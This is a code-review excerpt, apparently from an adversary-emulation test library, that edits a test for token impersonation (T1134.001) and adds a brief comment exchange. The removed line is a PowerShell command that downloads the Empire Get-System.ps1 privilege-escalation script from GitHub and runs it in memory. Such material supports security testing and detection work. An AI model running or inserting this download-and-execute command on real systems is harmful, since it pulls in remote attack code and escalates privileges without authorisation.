atomics/T1134.001/T1134.001.yaml

```diff
@@ -22,6 +23,7 @@ atomic_tests:
   supported_platforms:
   - windows
   executor:
-    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
+    command: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
```

Comment:
same

Reply:
I have corrected this and added the pipe